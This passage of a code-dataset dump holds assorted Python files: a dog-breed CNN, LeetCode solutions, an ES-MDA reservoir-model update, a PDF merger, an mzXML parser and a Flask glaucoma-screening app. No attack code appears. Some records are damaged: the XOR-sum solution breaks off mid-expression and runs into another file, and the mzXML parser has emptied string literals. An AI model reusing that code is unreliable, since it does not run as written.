int(input())\r\n\r\nfor i in range(n):\r\n entrada = input()\r\n solucao(entrada)","sub_path":"2021.2/linguagens_formais_e_automatos/listas/semana_6/frequencia_de_letras.py","file_name":"frequencia_de_letras.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"389600909","text":"import cv2\nimport matplotlib.pyplot as plt\nimport keras\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\nfrom keras.preprocessing import image\nfrom keras.models import Sequential\nfrom keras.utils import np_utils\nfrom sklearn.datasets import load_files\nfrom tqdm import tqdm\nimport numpy as np\nimport glob\nimport random\n\n# dog isolation and detection\n\nface_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_alt.xml')\n\ndef face_detector(img_path):\n img = cv2.imread(img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray)\n return len(faces) > 0\n\nResNet50_model = ResNet50(weights = 'imagenet')\n\ndef path_to_tensor(img_path):\n img = image.load_img(img_path, target_size = (224, 224))\n x = image.img_to_array(img)\n \n return np.expand_dims(x, axis = 0)\n\ndef paths_to_tensor(img_paths):\n list_of_tensors = [path_to_tensor(img_path) for img_path in tqdm(img_paths)]\n\n 
return np.vstack(list_of_tensors)\n\ndef ResNet50_predict_labels(img_path):\n img = preprocess_input(path_to_tensor(img_path))\n\n return np.argmax(ResNet50_model.predict(img))\n\ndef dog_detector(img_path):\n prediction = ResNet50_predict_labels(img_path)\n\n return ((prediction <= 268) & (prediction >= 151))\n\n# breed prediction CNN\n\n# load datasets\ndef load_dataset(path):\n\tdata = load_files(path)\n\tdog_files = np.array(data['filenames'])\n\tdog_targets = np_utils.to_categorical(np.array(data['target']), 133)\n\n\treturn dog_files, dog_targets\n\ntrain_files, train_targets = load_dataset('dataset/dogImages/train')\nvalid_files, valid_targets = load_dataset('dataset/dogImages/valid')\ntest_files, test_targets = load_dataset('dataset/dogImages/test')\n\ndog_classes = [item[20:-1] for item in sorted(glob.glob('dataset/dogImages/train/*/'))]\n\n# human images\nhuman_files = np.array(glob.glob('dataset/humanImages/lfw/lfw/*/*'))\nrandom.seed(8675309)\nrandom.shuffle(human_files)\n\n# ResNet50 bottleneck features\nbottleneck_features = np.load('bottleneck_features/DogResnet50Data.npz')\ntrain_DogResnet50 = bottleneck_features['train']\nvalid_DogResnet50 = bottleneck_features['valid']\ntest_DogResnet50 = bottleneck_features['test']\n\n# define model, adding a few layers to ResNet\nResnet50_model = Sequential()\nResnet50_model.add(keras.layers.GlobalAveragePooling2D(input_shape = train_DogResnet50.shape[1:]))\nResnet50_model.add(keras.layers.Dense(133, activation = 'softmax'))\n\nResnet50_model.summary()\n\nResnet50_model.compile(optimizer = 'rmsprop', \n\t\t\t\t\t loss = 'categorical_crossentropy', \n\t\t\t\t\t metrics = ['accuracy'])\n\ncheckpoint = keras.callbacks.ModelCheckpoint(\n\t\t'saved_models/weights.best.ResNet50.hdf5', \n\t\tverbose = 1, \n\t\tsave_best_only = True\n)\n\nResnet50_model.fit(train_DogResnet50, train_targets, \n\tvalidation_data = (valid_DogResnet50, valid_targets), \n\tepochs = 20, batch_size = 20, callbacks = [checkpoint])\n\nResnet50_model.load_weights('saved_models/weights.best.ResNet50.hdf5')\nResnet50_predictions = [np.argmax(Resnet50_model.predict(np.expand_dims(feature, axis = 0))) for feature in test_DogResnet50]\n\n# \ntest_acc = np.sum(np.array(Resnet50_predictions) == np.argmax(test_targets, axis = 1)) / len(Resnet50_predictions) * 100\nprint('Test Accuracy: ' + str(test_acc))\n\n# predict dog breed with model\ndef dog_breed(img_path):\n\tbottleneck_features = ResNet50(weights = 'imagenet', \n\t\t\tinclude_top = False).predict(preprocess_input(path_to_tensor(img_path)))\n\n\tpredicted_vector = ResNet50_model.predict(bottleneck_features)\n\n\treturn dog_classes[np.argmax(predicted_vector)]\n\ndef dog_breed_predictor(img_path):\n\tbreed = dog_breed(img_path)\n\timg = cv2.imread(img_path)\n\tcv2rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\tplt.imshow(cv2rgb)\n\tplt.show()\n\n\tif dog_detector(img_path):\n\t\tprint('This is a dog and its breed is ' + str(breed))\n\telif face_detector(img_path):\n\t\tprint('This is a human but looks like a ' + str(breed))\n\telse:\n\t\tprint('Unsure of what this is.')\n\n# test predictor\ndog_breed_predictor('dataset/dogImages/test/001.Affenpinscher/Affenpinscher_00003.jpg')\ndog_breed_predictor('dataset/humanImages/lfw/lfw/Aaron_Eckhart/Aaron_Eckhart_0001.jpg')","sub_path":"dog-breed-id/breed-model.py","file_name":"breed-model.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"218177038","text":"'''\n5737. 
Find XOR Sum of All Pairs Bitwise AND\nAuthor: Ayushi Rawat\n\nThe XOR sum of a list is the bitwise XOR of all its elements. If the list only contains one element, then its XOR sum will be equal to this element.\n\nFor example, the XOR sum of [1,2,3,4] is equal to 1 XOR 2 XOR 3 XOR 4 = 4, and the XOR sum of [3] is equal to 3.\nYou are given two 0-indexed arrays arr1 and arr2 that consist only of non-negative integers.\n\nConsider the list containing the result of arr1[i] AND arr2[j] (bitwise AND) for every (i, j) pair where 0 <= i < arr1.length and 0 <= j < arr2.length.\n\nReturn the XOR sum of the aforementioned list.\n\nExample 1:\n\nInput: arr1 = [1,2,3], arr2 = [6,5]\nOutput: 0\nExplanation: The list = [1 AND 6, 1 AND 5, 2 AND 6, 2 AND 5, 3 AND 6, 3 AND 5] = [0,1,2,0,2,1].\nThe XOR sum = 0 XOR 1 XOR 2 XOR 0 XOR 2 XOR 1 = 0.\nExample 2:\n\nInput: arr1 = [12], arr2 = [4]\nOutput: 4\nExplanation: The list = [12 AND 4] = [4]. The XOR sum = 4.\n \n\nConstraints:\n\n1 <= arr1.length, arr2.length <= 105\n0 <= arr1[i], arr2[j] <= 109\n'''\n\nclass Solution:\n def getXORSum(self, arr1: List[int], arr2: List[int]) -> int:\n A1=[0]*32\n A2=[0]*32\n for a in arr1:\n for i in range(32):\n if a&(1<\" + str(curNode)\n curNode = curNode.next\n res += \")\"\n return res\n\n\ndef sizeByHeadNode( headNode ):\n if headNode == None:\n return 0\n\n curNode = headNode\n res = 0\n while curNode != None:\n res += 1\n curNode = curNode.next\n return res\n\n\ndef isAscendListByHeadNode( headNode ):\n\n curNode = headNode\n while curNode.next != None:\n if curNode.next.val < curNode.val:\n return False\n curNode = curNode.next\n return True\n\n \nclass Solution:\n # @param {ListNode[]} lists\n # @return {ListNode}\n def mergeKLists(self, lists):\n\n if len(lists) == 0:\n return None\n \n minheap = []\n for i in range(len(lists)):\n if lists[i] != None: \n minheap.append( (lists[i].val,i) )\n if len(minheap) == 0:\n return None\n \n heapq.heapify(minheap)\n #print(minheap)\n\n curNode = ListNode(None)\n headNode = curNode\n while len(minheap) > 0:\n curMinVal , listIndex = heapq.heappop(minheap)\n #print( \"lists = \" , lists )\n #print( \"curMinVal =\" , curMinVal )\n\n curNode.next = ListNode( curMinVal )\n curNode = curNode.next\n\n lists[listIndex] = lists[listIndex].next\n if lists[listIndex] != None:\n heapq.heappush( minheap , ( lists[listIndex].val , listIndex ) )\n \n return headNode.next\n\n\ndef bigTestMergeKLists():\n\n k = random.randint( 2 , 100 )\n lists = []\n elementsNum = 0\n for i in range( k ):\n n = random.randint( 10 , 1000 )\n arr = [random.randint(0,10**5)]\n for j in range(1,n):\n arr.append( arr[j-1] + random.randint(0,10**3) )\n elementsNum += len( arr )\n lists.append( createHeadListNodeByArray( arr ) )\n\n solver = Solution()\n resListNode = solver.mergeKLists( lists )\n if sizeByHeadNode( resListNode ) == elementsNum and isAscendListByHeadNode( resListNode ):\n print(\"ok\")\n else:\n print(\"ERROR\")\n\n\ndef smallTestMergeKLists():\n\n k = 3\n lists = []\n elementsNum = 0\n for i in range( k ):\n n = 5\n arr = [random.randint(0,100)]\n for j in range(1,n):\n arr.append( arr[j-1] + random.randint(0,10) )\n elementsNum += len( arr )\n lists.append( createHeadListNodeByArray( arr ) )\n\n solver = Solution()\n resListNode = solver.mergeKLists( lists )\n if sizeByHeadNode( resListNode ) == elementsNum and isAscendListByHeadNode( resListNode ):\n print(\"ok\")\n print( \"res =\" , listStringiByListNode( resListNode ) )\n else:\n print( \"len(res) =\" , sizeByHeadNode( resListNode ) )\n 
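# Aside (editorial note): the bit-counting solution above works because AND
# distributes over XOR. Per bit position, the number of (i, j) pairs whose
# AND has that bit set is (#set in arr1) * (#set in arr2), which is odd iff
# both counts are odd -- exactly the bit of (XOR arr1) AND (XOR arr2). So
# the whole problem reduces to a one-liner:
from functools import reduce
from operator import xor

def get_xor_sum(arr1, arr2):
    return reduce(xor, arr1) & reduce(xor, arr2)

assert get_xor_sum([1, 2, 3], [6, 5]) == 0
assert get_xor_sum([12], [4]) == 4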
print( \"ERROR!!!\" , listStringiByListNode( resListNode ) )\n\n \nif __name__ == \"__main__\":\n\n bigTestMergeKLists()\n #smallTestMergeKLists()\n \n","sub_path":"023-Merge-K-Sorted-Lists[heapq]_20150623.py","file_name":"023-Merge-K-Sorted-Lists[heapq]_20150623.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"258060694","text":"##---------------------------------------------------------------------------\r\n##'History matching data assimilation technique using covariance localization with ESMDA for PUNQ Reservoir' ) \r\n##'Supervisor: Dr Rossmary Villegas'\r\n##'Co-supervisor: Dr Masoud Babei'\r\n##'Co-supervisor: Dr Oliver Dorn'\r\n##'PhD Student: Clement Etienam'\r\n##'MEng Student: Yap Shan Wei\r\n##------------------------------------------------------------------------------\r\n\r\nimport numpy as np\r\nimport scipy.ndimage.morphology as spndmo\r\nimport globalvariables as glb\r\nfrom matpinv import pinvmat\r\n\r\ndef ESMDALocalisation2(sg,sgporo,f,Sim1,alpha,c):\r\n\r\n print(' Loading the files ')\r\n ## Get the localization for all the wells\r\n\r\n A = np.zeros((120,60,5))\r\n for jj in range(5):\r\n A[13,24,jj] = 1\r\n A[37,38,jj] = 1\r\n A[95,22,jj] = 1\r\n A[66,40,jj] = 1\r\n A[29,54,jj] = 1\r\n A[57,17,jj] = 1\r\n A[89,5,jj] = 1\r\n A[100,38,jj] = 1\r\n\r\n print( ' Calculate the Euclidean distance function to the 6 producer wells')\r\n lf = np.reshape(A,(glb.Nx,glb.Ny,glb.Nz),'F')\r\n young = np.zeros((int(glb.totalgrids/glb.Nz),5))\r\n for j in range(5):\r\n sdf = lf[:,:,j]\r\n (usdf,IDX) = spndmo.distance_transform_edt(np.logical_not(sdf), return_indices = True)\r\n usdf = np.reshape(usdf,(int(glb.totalgrids/glb.Nz)),'F')\r\n young[:,j] = usdf\r\n\r\n sdfbig = np.reshape(young,(glb.totalgrids,1),'F')\r\n sdfbig1 = abs(sdfbig)\r\n z = sdfbig1\r\n ## the value of the range should be computed accurately.\r\n \r\n c0OIL1 = np.zeros((glb.totalgrids,1))\r\n \r\n print( ' Computing the Gaspari-Cohn coefficent')\r\n for i in range(glb.totalgrids):\r\n if ( 0 <= z[i,:] or z[i,:] <= c ):\r\n c0OIL1[i,:] = -0.25*(z[i,:]/c)**5 + 0.5*(z[i,:]/c)**4 + 0.625*(z[i,:]/c)**3 - (5.0/3.0)*(z[i,:]/c)**2 + 1\r\n\r\n elif ( z < 2*c ):\r\n c0OIL1[i,:] = (1.0/12.0)*(z[i,:]/c)**5 - 0.5*(z[i,:]/c)**4 + 0.625*(z[i,:]/c)**3 + (5.0/3.0)*(z[i,:]/c)**2 - 5*(z[i,:]/c) + 4 - (2.0/3.0)*(c/z[i,:])\r\n\r\n elif ( c <= z[i,:] or z[i,:] <= 2*c ):\r\n c0OIL1[i,:] = -5*(z[i,:]/c) + 4 -0.667*(c/z[i,:])\r\n\r\n else:\r\n c0OIL1[i,:] = 0\r\n \r\n c0OIL1[c0OIL1 < 0 ] = 0\r\n \r\n print(' Getting the Gaspari Cohn for Cyd') \r\n \r\n schur = c0OIL1\r\n Bsch = np.tile(schur,(1,glb.N))\r\n \r\n yoboschur = np.ones((glb.Np*glb.totalgrids + glb.No,glb.N))\r\n \r\n yoboschur[0:glb.totalgrids,0:glb.N] = Bsch\r\n yoboschur[glb.totalgrids:2*glb.totalgrids,0:glb.N] = Bsch\r\n\r\n sgsim11 = np.reshape(np.log(sg),(glb.totalgrids,glb.N),'F')\r\n sgsim11poro = np.reshape(sgporo,(glb.totalgrids,glb.N),'F')\r\n \r\n print(' Determining standard deviation of the data ')\r\n stddWOPR1 = 0.15*f[0]\r\n stddWOPR2 = 0.15*f[1]\r\n stddWOPR3 = 0.15*f[2]\r\n stddWOPR4 = 0.15*f[3]\r\n\r\n stddWWCT1 = 0.2*f[4]\r\n stddWWCT2 = 0.2*f[5]\r\n stddWWCT3 = 0.2*f[6]\r\n stddWWCT4 = 0.2*f[7]\r\n \r\n stddBHP1 = 0.1*f[8]\r\n stddBHP2 = 0.1*f[9]\r\n stddBHP3 = 0.1*f[10]\r\n stddBHP4 = 0.1*f[11]\r\n \r\n stddGORP1 = 0.15*f[12]\r\n stddGORP2 = 0.15*f[13]\r\n stddGORP3 = 0.15*f[14]\r\n stddGORP4 = 0.15*f[15]\r\n\r\n print(' Generating Gaussian noise ')\r\n 
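# Aside (editorial sketch): a vectorised form of the Gaspari-Cohn taper that
# the loop above builds element-wise. Note the source's branch guards use
# `or` (e.g. `0 <= z[i,:] or z[i,:] <= c`), which is always true for z >= 0,
# so only the first polynomial is ever evaluated and negatives are clipped
# afterwards. The standard piecewise quintic with compact support 2c:
import numpy as np

def gaspari_cohn(z, c):
    r = np.abs(np.asarray(z, dtype=float)) / c
    taper = np.zeros_like(r)
    inner = r <= 1.0
    outer = (r > 1.0) & (r < 2.0)
    ri, ro = r[inner], r[outer]
    taper[inner] = -0.25 * ri**5 + 0.5 * ri**4 + 0.625 * ri**3 - (5 / 3) * ri**2 + 1
    taper[outer] = (ro**5 / 12 - 0.5 * ro**4 + 0.625 * ro**3
                    + (5 / 3) * ro**2 - 5 * ro + 4 - (2 / 3) / ro)
    return taper

vals = gaspari_cohn([0.0, 1.0, 2.0], c=1.0)
assert vals[0] == 1.0 and abs(vals[1] - 5 / 24) < 1e-12 and vals[2] == 0.0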
Error1 = np.ones((glb.No,glb.N)) \r\n    Error1[0,:] = np.random.normal(0,stddWOPR1,(glb.N))\r\n    Error1[1,:] = np.random.normal(0,stddWOPR2,(glb.N))\r\n    Error1[2,:] = np.random.normal(0,stddWOPR3,(glb.N))\r\n    Error1[3,:] = np.random.normal(0,stddWOPR4,(glb.N))\r\n    Error1[4,:] = np.random.normal(0,stddWWCT1,(glb.N))\r\n    Error1[5,:] = np.random.normal(0,stddWWCT2,(glb.N))\r\n    Error1[6,:] = np.random.normal(0,stddWWCT3,(glb.N))\r\n    Error1[7,:] = np.random.normal(0,stddWWCT4,(glb.N))\r\n    Error1[8,:] = np.random.normal(0,stddBHP1,(glb.N))\r\n    Error1[9,:] = np.random.normal(0,stddBHP2,(glb.N))\r\n    Error1[10,:] = np.random.normal(0,stddBHP3,(glb.N))\r\n    Error1[11,:] = np.random.normal(0,stddBHP4,(glb.N))\r\n    Error1[12,:] = np.random.normal(0,stddGORP1,(glb.N))\r\n    Error1[13,:] = np.random.normal(0,stddGORP2,(glb.N))\r\n    Error1[14,:] = np.random.normal(0,stddGORP3,(glb.N))\r\n    Error1[15,:] = np.random.normal(0,stddGORP4,(glb.N))\r\n    Error1[16,:] = np.random.normal(0,0.062265,(glb.N))\r\n\r\n    Cd2 = (Error1.dot(Error1.T))/(glb.N - 1)\r\n\r\n    Dj = np.zeros((glb.No, glb.N))\r\n    for j in range(glb.N):\r\n        Dj[:,j] = f + Error1[:,j]\r\n\r\n    print(' Generating the ensemble state matrix with parameters and states ')\r\n    overall = np.zeros((glb.Np*glb.totalgrids + glb.No,glb.N))\r\n\r\n\r\n    overall[0:glb.totalgrids,0:glb.N] = sgsim11\r\n    overall[glb.totalgrids:2*glb.totalgrids,0:glb.N] = sgsim11poro\r\n    overall[glb.Np*glb.totalgrids:glb.Np*glb.totalgrids + glb.No,0:glb.N] = Sim1\r\n\r\n    Y = overall\r\n\r\n    M = np.mean(Sim1, axis = 1)\r\n    M2 = np.mean(overall, axis = 1)\r\n\r\n    S = np.zeros((Sim1.shape[0],glb.N))\r\n    yprime = np.zeros(((glb.Np)*glb.totalgrids + glb.No,glb.N))\r\n    \r\n    for j in range(glb.N):\r\n        S[:,j] = Sim1[:,j]- M\r\n        yprime[:,j] = overall[:,j] - M2\r\n\r\n    print (' Updating the new ensemble')\r\n    Cyd = (yprime.dot(S.T))/(glb.N - 1)\r\n    Cdd = (S.dot(S.T))/(glb.N - 1)\r\n\r\n\r\n##    print (' Rescaling the denominator matrix')\r\n##    Ri = np.array(splg.lapack.dpotrf(alpha*Cd2))\r\n##    Rii = Ri[0]\r\n##    Rii = np.reshape(Rii,(Rii.size,1),'F')\r\n##    for i in range(Rii.size):\r\n##        if Rii[i] != 0:\r\n##            Rii[i] = Rii[i]**-1\r\n##\r\n##    Ri = np.reshape(Rii,(Ri[0].shape),'F')\r\n##    Ctilde = ((Ri**-1).dot(Cdd.dot((Ri**(-1)).T))) + np.ones(Sim1.shape)\r\n##\r\n##    \r\n##    Usigt,Sigt,Vsigt = np.linalg.svd(Ctilde, full_matrices = False)\r\n##    xsmall = np.diag(Sigt)\r\n##    Bsigt = np.cumsum(xsmallt, axis = 0) # vertically addition\r\n##    valuesigt = Bsigt[-1] # last element\r\n##    valuesigt = valuesigt * 0.9999\r\n##    indicest = ( Bsigt >= valuesigt ).ravel().nonzero()\r\n##    toluset = xsmallt[indicest]\r\n##    tol = toluset[0]\r\n\r\n    Usig,Sig,Vsig = np.linalg.svd((Cdd + (alpha*Cd2)), full_matrices = False)\r\n    Bsig = np.cumsum(Sig, axis = 0) # vertically addition\r\n    valuesig = Bsig[-1] # last element\r\n    valuesig = valuesig * 0.9999\r\n    indices = ( Bsig >= valuesig ).ravel().nonzero()\r\n    toluse = Sig[indices]\r\n    tol = toluse[0]\r\n\r\n\r\n\r\n    print(' Update the new ensemble ')\r\n    (V,X,U) = pinvmat((Cdd + (alpha*Cd2)),tol)\r\n    \r\n    Ynew = Y + yoboschur*((Cyd.dot(X)).dot(Dj - Sim1))\r\n\r\n    print(' Extracting the active permeability fields ')\r\n    value1 = Ynew[0:glb.totalgrids,0:glb.N]\r\n\r\n    DupdateK = np.exp(value1)\r\n\r\n    sgsim2 = Ynew[glb.totalgrids:glb.totalgrids*2,0:glb.N]\r\n\r\n    return (sgsim2,DupdateK)\r\n","sub_path":"SPE10 Python/ES-MDA Covariance Localisation 
Python/ESMDA_localisation2.py","file_name":"ESMDA_localisation2.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"450350070","text":"import time\n\nimport PyPDF2\nimport re\nimport os\ndef merge_pdf(name):\n    '''\n    Merge the PDFs\n    '''\n    print('Merging the final pdf')\n    # find all the pdf files in current directory.\n    mypath = os.getcwd()\n    pattern = r\"\\.pdf$\"\n    file_names_lst = [mypath + \"\\\\\" + f for f in os.listdir(mypath) if re.search(pattern, f, re.IGNORECASE)\n                      and not re.search(name+'.pdf', f)]\n\n    # sort the file paths by page number\n    dic = {}\n    for i in range(len(file_names_lst)):\n        page = re.findall(r'(\\d+)\\.pdf', file_names_lst[i])[0]\n        dic[int(page)] = file_names_lst[i]\n    file_names_lst = sorted(dic.items(), key=lambda x: x[0])\n    file_names_lst = [file[1] for file in file_names_lst]\n\n    # merge the file.\n    opened_file = [open(file_name, 'rb') for file_name in file_names_lst]\n    pdfFM = PyPDF2.PdfFileMerger()\n    for file in opened_file:\n        # print('Appended {}.pdf'.format(file))\n        pdfFM.append(file)\n\n    # output the file.\n    start = time.time()\n    with open(mypath + \"\\\\\" + name + \".pdf\", 'wb') as write_out_file:\n        pdfFM.write(write_out_file)\n    end = time.time()\n    print(end-start)\n    # close all the input files.\n    for file in opened_file:\n        file.close()\n\n    print('Finished merging %s' % name)\n\nif __name__=='__main__':\n    merge_pdf('从零开始')","sub_path":"书香清华/Python从零开始学/composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"593235648","text":"def merge_sort(lst):\r\n    \"\"\"Perform merge sorting on a list.\"\"\"\r\n    if len(lst) > 1:\r\n        mid = len(lst) // 2\r\n        left = lst[:mid]\r\n        right = lst[mid:]\r\n\r\n        merge_sort(left)\r\n        merge_sort(right)\r\n\r\n        left_idx = 0\r\n        right_idx = 0\r\n        lst_idx = 0\r\n\r\n        while left_idx < len(left) and right_idx < len(right):\r\n            if left[left_idx] < right[right_idx]:\r\n                lst[lst_idx] = left[left_idx]\r\n                left_idx += 1\r\n            else:\r\n                lst[lst_idx] = right[right_idx]\r\n                right_idx += 1\r\n            lst_idx += 1\r\n\r\n        while left_idx < len(left):\r\n            lst[lst_idx] = left[left_idx]\r\n            left_idx += 1\r\n            lst_idx += 1\r\n        \r\n        while right_idx < len(right):\r\n            lst[lst_idx] = right[right_idx]\r\n            right_idx += 1\r\n            lst_idx += 1\r\n        \r\n\r\n","sub_path":"src/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"537293894","text":"#!/usr/bin/env python\nimport os \nimport sys\n\nfilename_mzXML = sys.argv[1]\n \nscan_id = 0\nscan_info = dict()\nf_mzXML = open(filename_mzXML,'r')\nfor line in f_mzXML:\n    line = line.strip().rstrip('>')\n    if( line.startswith('')[0]\n        if( tmp.startswith('precursorScanNum') ):\n            tmp_precursor_id = int(tmp.replace('\"','').split('=')[1])\n            scan_info[scan_id]['precursor_id'] = tmp_precursor_id\n            scan_info[tmp_precursor_id]['ms2_count'] += 1\n        if( tmp.startswith('precursorCharge') ):\n            scan_info[scan_id]['precursor_charge'] = int(tmp.replace('\"','').split('=')[1])\n        scan_info[scan_id]['precursor_mz'] = float(line.split('>')[1].split('<')[0])\nf_mzXML.close()\n\n## Some mzXML do not have precursorScanNum\nms1_id = 0\nfor tmp_scan_id in sorted(scan_info.keys()):\n    if( scan_info[tmp_scan_id]['msLevel'] == 1 ):\n        ms1_id = tmp_scan_id\n    else:\n        scan_info[ms1_id]['ms2_count'] += 1\n        scan_info[tmp_scan_id]['precursor_id'] = ms1_id\n\ndef 
get_param(args, keyword):\n    if keyword in args:  # dict.has_key() was removed in Python 3\n        return args[keyword]\n    return 0.0\n\nf_ms1 = open('%s.ms1_info'%filename_mzXML,'w')\nf_ms2 = open('%s.ms2_info'%filename_mzXML,'w')\nf_ms1.write('#ScanID\\tRetTime\\tCountMS2\\tTotIon\\n')\nf_ms2.write('#ScanID\\tRetTime\\tPrecursorID\\tPrecursorCharge\\tPrecursorMz\\tTotIon\\n')\nfor tmp_scan_id in sorted(scan_info.keys()):\n    tmp = scan_info[tmp_scan_id]\n    if( tmp['msLevel'] == 1 ):\n        f_ms1.write('%05d\\t%.4f\\t%d\\t%d\\n'%(tmp_scan_id, tmp['ret_time'], tmp['ms2_count'], tmp['tot_ion']))\n    if( tmp['msLevel'] == 2 ):\n        tmp_ret_time = get_param(tmp, 'ret_time')\n        tmp_precursor_charge = get_param(tmp, 'precursor_charge')\n        tmp_precursor_id = get_param(tmp, 'precursor_id')\n        tmp_precursor_mz = get_param(tmp, 'precursor_mz')\n        tmp_tot_ion = get_param(tmp, 'tot_ion')\n        f_ms2.write('%05d\\t%.4f\\t%05d\\t%d\\t%.5f\\t%.2f\\n'%(tmp_scan_id, tmp_ret_time, tmp_precursor_id, tmp_precursor_charge,tmp_precursor_mz,tmp_tot_ion))\nf_ms1.close()\nf_ms2.close()\n","sub_path":"raw/mzXML-to-ms1ms2_info.py","file_name":"mzXML-to-ms1ms2_info.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"13503149","text":"import os\nimport base64\nimport numpy as np\nimport io\nfrom PIL import Image\nfrom keras import backend as K\nfrom skimage.measure import label,regionprops\nimport cv2\nfrom skimage.transform import resize\nfrom skimage.io import imsave\nfrom keras.models import Model, load_model\nfrom skimage.exposure import equalize_adapthist\n\nfrom flask import Flask, url_for, redirect, render_template, request, jsonify\nfrom werkzeug import secure_filename\n\nUPLOAD_FOLDER = 'C:/Users/ashi agarwal/Documents/Flask_apps/DeepEye/static/Images'\n\n# keep a single Flask instance; re-creating Flask(__name__) after setting\n# config would silently discard the configured UPLOAD_FOLDER\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef get_od_model():\n    global modelod\n    modelod = load_model('Rimone_128.hdf5',custom_objects={'dice_coef':dice_coef,'iu':iu,'iouLoss':iouLoss,'acc':acc,'IOU':IOU})\n    print('*OD Model loaded!!')\ndef get_oc_model():\n    global modeloc\n    modeloc = load_model('RIMONE_OC_model-ep027-loss0.389-val_loss0.394.hdf5',custom_objects={'dice_coef':dice_coef,'iu':iu,'iouLoss':iouLoss,'acc':acc,'IOU':IOU})\n    print('*OC Model loaded!!')\n#def get_class_model():\n   # global model\n   # model = load_model('Rimone_128.hdf5')\n   # print('*OD Model loaded!!')\ndef preprocessOD():\n    global image\n    image=equalize_adapthist(np.array(Image.open('./static/Images/input.jpg').resize([128,128],Image.BICUBIC)))\n    image=image.reshape([1,128,128,3])\n    image/=np.max(image)\n    image-=np.mean(image)\n    image/=np.std(image)\n    return image\ndef preprocessOC(image1):\n    global mir,mic,mar,mac\n    im=image1\n    li=label(im+0.5)\n    region=regionprops(li)\n    mir,mic,mar,mac=region[0].bbox\n    cx=image[0,mir:mar,mic:mac,:]\n    c_x=cv2.resize(cx,(128,128),interpolation=cv2.INTER_AREA)\n    c_x=c_x.reshape([1,128,128,3])\n    return c_x\ndef dice_coef(y_true, y_pred):\n    intersection = K.sum(y_true * y_pred)\n    return (2. 
* intersection + 1) / (K.sum(y_true) + K.sum(y_pred) + 1)\n#%%\ndef iu(y_true, y_pred):\n a2=K.sum(y_true*y_true)\n b2=K.sum(y_pred*y_pred)\n iu=K.sum(y_true*y_pred)/(a2+b2-K.sum(y_true*y_pred))\n return iu\n#%%\ndef iouLoss(y_true, y_pred):\n return-K.log(iu(y_true,y_pred))\n#%%\ndef acc(y_true, y_pred):\n TP = K.sum(y_true * y_pred)\n FP=K.sum((K.max(y_true)-y_true) * y_pred)\n return (TP)/(TP+FP)\n\n#%%\ndef IOU(y_true, y_pred):\n intersection = K.sum(y_true * y_pred)\n union=K.sum((y_true+y_pred)/2)\n iou=intersection/union\n return iou\n\nprint(\"* Loading OD segmentation Model\")\nget_od_model()\nprint(\"* Loading OC segmentation Model\")\nget_oc_model()\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n@app.route(\"/instruction\")\ndef instruction():\n return render_template(\"instructions.html\")\n\n@app.route(\"/projectDiscription\")\ndef pro_dis():\n return render_template(\"projectDes.html\")\n\n@app.route(\"/tool\")\ndef tool():\n\treturn render_template(\"tool.html\")\n\n@app.after_request\ndef add_header(response):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n response.headers['Cache-Control'] = 'public, max-age=0'\n return response\n\n@app.route(\"/upload\",methods=['POST'])\ndef upload():\n\tif request.method == 'POST':\n\t\tfile = request.files['file']\n\t\tfilename = secure_filename(file.filename)\n\t\tos.remove('./static/Images/input.jpg')\n\t\tfile.save('static/Images/input.jpg')\n\t #return redirect(url_for('uploaded_file',filename=filename))\n\t #return render_template(\"tool.html\")\n\treturn redirect(url_for('tool'))\n\n@app.route(\"/preidct\")\ndef predict():\n im1=preprocessOD()\n y_od=modelod.predict(im1, verbose=1)\n y_od=y_od.reshape([128,128])\n os.remove('./static/Images/od.jpg')\n imsave('./static/Images/od.jpg', y_od)\n im2=preprocessOC(y_od)\n y_oc=modeloc.predict(im2, verbose=1)\n y_oc=y_oc.reshape([128,128])\n oc_pred=np.zeros([128,128],dtype='float32')\n cx=cv2.resize(y_oc,((mac-mic),(mar-mir)),interpolation=cv2.INTER_AREA)\n oc_pred[mir:mar,mic:mac]=cx\n os.remove('./static/Images/oc.jpg')\n imsave('./static/Images/oc.jpg', oc_pred)\n li1=label(y_od+0.5)\n li2=label(oc_pred+0.5)\n region1=regionprops(li1)\n region2=regionprops(li2)\n mir1,mic1,mar1,mac1=region1[0].bbox\n mir2,mic2,mar2,mac2=region2[0].bbox\n OD_Diam=mac1-mic1\n OC_Diam=mac2-mic2\n CDR=OC_Diam/OD_Diam\n print(CDR)\n g_h= 1 if CDR>0.5 else 0\n if (g_h):\n response={'prediction': '*** GLAUCOMATIC!!! ***'}\n print(' *** GLAUCOMATIC!!! ***')\n else:\n response={'prediction': '*** HEALTHY!!! ***'}\n print(' *** HEALTHY!!! ***')\n\n return redirect(url_for('tool'))\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"284032066","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . 